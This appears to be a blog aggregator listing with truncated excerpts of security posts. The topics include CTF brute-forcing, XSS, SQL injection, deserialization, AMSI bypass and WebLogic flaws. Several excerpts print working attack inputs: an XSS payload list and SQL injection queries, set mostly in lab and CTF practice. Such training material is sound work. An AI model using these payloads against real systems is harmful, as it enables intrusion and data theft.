Introduction to CTFSHOW web 21-28
CTFSHOW blasting [21-28]
Web21
You can see that the selected text - > decoded from is decoded by Base64 The format of account password is [username]:[password] So we can use the custom payload in the introder module
position 1: admin position 2: (:) is a colon and does not need parentheses (easy to see) position 3: you can use the ...
Added by foxy69 on Sat, 11 Dec 2021 12:23:41 +0200
DS_Store file leak
What DS_Store
.DS_Store is a hidden file for Mac OS to save custom properties of folders, such as the icon position or background color of the file, which is equivalent to desktop.ini of Windows. The side effect of deletion is the loss of this information.
When exchanging files with others (or when your web page needs to be uploaded), you s ...
Added by kaeserea on Wed, 01 Dec 2021 02:01:13 +0200
Pikachu PHP deserialization
A previous article introduced it in detail Principle of php deserialization No more here
Do some practice in this shooting range
0x01 source code audit
At present, my understanding is that mining deserialization requires knowing the details of the classes, objects and parameters of the interface,
And the magic method.
The call here is re ...
Added by MetaDark on Fri, 26 Nov 2021 14:28:40 +0200
xss command summary
1: Normal construction mode:
1. No filter, write directly:<script>alert(1)</script>
2. Normal truncation:
"> <script>alert(1)</script>
'> <script>alert(1)</script>
3. No < > angle brackets
" onmouseover=alert(1) Space
' onmouseover=alert(1) Space
' onclick=alert(1) Space
" onfocus=alert(1) ...
Added by zypher11 on Sat, 20 Nov 2021 21:22:44 +0200
2021-11-13 encryption and decryption, secondary, load_file&dnslog injection
Xiaodi v17
Encryption and decryption sqlilabs-page2-less21
You can see that the cookie has been base64 processed
Use error injection
')union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand()*2))x from information_schema.tables group by x#
base64 encryption ...
Added by siwelis on Wed, 17 Nov 2021 13:11:45 +0200
Research and idea of avoiding killing by bypassing AMSI
What is AMSI
Antimalware Scan Interface(AMSI) is an anti malware scanning interface.
Microsoft described his purpose:
The Windows antimalware scanning interface (AMSI) is a common interface standard that allows your applications and services to integrate with any antimalware products that exist on your machine. AMSI provides enhanced malw ...
Added by steeveherris on Fri, 12 Nov 2021 00:41:37 +0200
The Ethernet node RPC port is open to the network security configuration being attacked
Ethereum supports RPC mode. When this mode is enabled, the Ethereum account can automatically complete some operations, such as automatic transfer to the wallet after digging out coins in the mine pool. Attackers mainly use RPC open ports, so they can protect themselves by limiting RPC ports.
1, The following main attack methods are analyz ...
Added by uatec on Mon, 25 Oct 2021 10:05:28 +0300
Principle analysis of JAVA deserialization vulnerability
Principle analysis of deserialization vulnerability
Start with serialization and deserialization
What are serialization and deserialization? In short, serialization is the process of converting an object into a byte sequence (that is, a form that can be stored or transmitted), while deserialization is its inverse operation, that is, the pro ...
Added by ShaileshD on Tue, 12 Oct 2021 08:44:30 +0300
Security vulnerability analysis of Weblogic12c T3 protocol
preface
WebLogic is an application server produced by American Oracle company, specifically a middleware based on JAVAEE architecture. Java application server is mainly used to develop, integrate, deploy and manage large-scale distributed Web applications, network applications and database applications. In recent years, many RCE vulnerabilitie ...
Added by chriscloyd on Sat, 02 Oct 2021 21:53:28 +0300
ctfhub skill tree WEB(SQL injection and file upload)
injection
1. Determine injection type
1 and 1=1 Normal output
1 and 1=2 No output (Digital injection)
2. Number of guess fields
1 order by 2 Page echo normal
1 order by 3 Page no echo The number of fields is 2
3. View display bit
-1 union select 1,2 The display bit is Data
4. View data ...
Added by tharagleb on Tue, 21 Sep 2021 22:15:36 +0300